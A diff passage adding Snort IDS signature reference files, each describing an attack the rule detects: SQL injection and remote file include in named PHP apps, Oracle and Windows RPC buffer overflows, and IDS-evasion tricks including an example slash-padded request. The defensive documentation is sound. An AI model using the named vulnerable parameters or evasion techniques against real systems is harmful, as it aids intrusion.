+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000844.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000844
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Koobi Pro" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "showtopic" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "showtopic" parameter in the "index.php" script used by the "Koobi Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Koobi Pro
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2159.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2158
+
+--
+Summary:
+This event is generated when an invalid BGP type is detected. 
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event indicates that a Border Gateway Protocol (BGP) packet with an invalid type has been detected.
+
+BGP packets must have a type of 1 or more. This event indicates that a BGP packet was detected with a type of 0. This may be related to another issue regarding invalid BGP datasizes. See sid 2158 for further information.
+
+Note: if sid 2158 has been disabled, this event will be generated if the type of problem described in the documentation for sid 2158 is detected.
+
+--
+Affected Systems:
+This BGP packet may cause problems with TCPDump.
+
+--
+Attack Scenarios:
+An attacker would need to craft a special BGP packet with a type of 0 or a datasize of less than 20 bytes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2942.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2942
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2602.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2602
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_master_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck87.html
+
+--
--- /dev/null
+++ b/doc/signatures/3311.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3311
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000606.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000606
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "lang_modify.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "lang_modify.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/445.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+445
+
+--
+Summary:
+This event is generated when an ICMP "SKIP" message is generated.
+
+--
+Impact:
+Informational.  This indicates that an error condition was encountered when requesting the Simple Key Management Protocol for IP (SKIP) protocol to provide keying material.
+
+--
+Detailed Information:
+An ICMP "SKIP" message is issued when a SKIP request to provide keying material fails.  This may occur when the sender makes a request via a SKIP packet for some kind of algorithm, such as encryption, that is not supported by the receiver.  The receiver responds with this ICMP message to indicate that the requested algorithm is not supported. 
+
+--
+Affected Systems:
+This traffic should have no adverse impact.
+
+--
+Attack Scenarios:
+This is not an attack unless these messages are sent in volume for an attempted denial of service.
+
+--
+Ease of Attack:
+Simple. There are many packages available to generate ICMP messages.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+None.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000436.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000436
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "Bs_Wse_Profile.class.php" using a remote file being passed as the "APP[path][plugins]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][plugins]" parameter in the "Bs_Wse_Profile.class.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3128.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3128
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/119-8.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+119-8
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects web
+requests that incorporate multiple concurrent "/" characters.
+
+This may be an attempt to obfuscate an attack and may also indicate an
+attempt to evade an IDS.
+
+--
+Affected Systems:
+	All web servers.
+
+--
+Attack Scenarios: 
+An attacker can add multiple "/" characters to a request like this.
+
+GET http://www.victim.com////////////////vulnerable/application.dll
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/100000681.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000681
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "header.php" using a remote file being passed as the 
+"theme_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "theme_root" parameter in the "header.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/122-9.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-9
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2950.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2950
+
+--
+Summary:
+This event is generated when multiple stacked SMB requests are made.
+
+--
+Impact:
+Possible IDS evasion.
+
+--
+Detailed Information:
+This event is generated when multiple stacked SMB requests are detected.
+This behavior does not occur on a regular basis in normal network
+traffic. This event may indicate an attempt to evade an IDS.
+
+--
+Affected Systems:
+	All systems using SMB.
+
+--
+Attack Scenarios:
+An attacker might create multiple stacked SMB requests in an attempt to
+bypass an IDS.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+If the second and third stacked requests are of a combined length that
+is less than 37 bytes this rule will not generate an event.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disallow the use of SMB.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2881.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2881
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_priority_group
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3087.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+3087
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow in Microsoft Browser Client Context Tool (W3Who.dll).
+
+--
+Impact:
+Denial of service or remote access. If the exploit is successful,
+an attacker can gain remote access to the host with system privileges.
+
+--
+Detailed Information:
+W3Who is an Internet Server Application Programming Interface (ISAPI)
+application dynamic-link library (DLL) that works within a Web page to
+display information about the calling context of the client browser and
+the configuration of the host server. W3Who is included in the Windows
+2000 Server Resource Kit.
+
+A boundary error within the processing of parameters can be exploited
+to cause a buffer overflow by passing an overly long parameter.
+
+--
+Affected Systems:
+Microsoft IIS with W3Who.dll. (W3Who.dll is not automatically installed
+with IIS.)
+
+--
+Attack Scenarios:
+An attacker can send a malformed HTTP request with an overly long
+parameter to W3Who DLL, subsequently causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Any overly large request URI with a reference to w3who.dll will be
+detected.
+
+--
+False Negatives:
+This rule only detects the attack when the parameters are passed
+as part of the URI (GET method).
+
+--
+Corrective Action:
+Disable the W3Who.dll ISAPI extension.
+
+--
+Contributors:
+nnposter@users.sourceforge.net
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;Q323640
+
+--
--- /dev/null
+++ b/doc/signatures/839.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+839
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running on a web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1978.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1978
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/2397.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+2397
+
+--
+Summary:
+This event is generated when an attacker includes "/whereami.cgi" in a URL, typically aimed at a web server running the CCBill software. 
+
+--
+Impact:
+Execution of arbitrary commands.
+
+--
+Detailed Information:
+The CCBill software is available to manage credit card information for UNIX and Windows hosts.  The script whereami.cgi is used for technical support of the software.  A vulnerability exists in the whereami.cgi script that allows the execution of arbitrary commands from an attacker who passes a command via whereami.cgi?g=command format in a URL.  Supplied commands can list file names, show the contents of the password file, or install a backdoor to name a few actions that an attacker may attempt.
+
+--
+Affected Systems:
+Hosts running CCBill software that has the whereami.cgi in the server's CGI path.
+
+--
+Attack Scenarios:
+An attacker can send a request to execute an arbitrary command.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the whereami.cgi command.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+bugtraq
+http://www.securityfocus.com/bid/8095
+
+--
--- /dev/null
+++ b/doc/signatures/955.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+955
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+--
--- /dev/null
+++ b/doc/signatures/3028.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3028
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3283.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3283
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
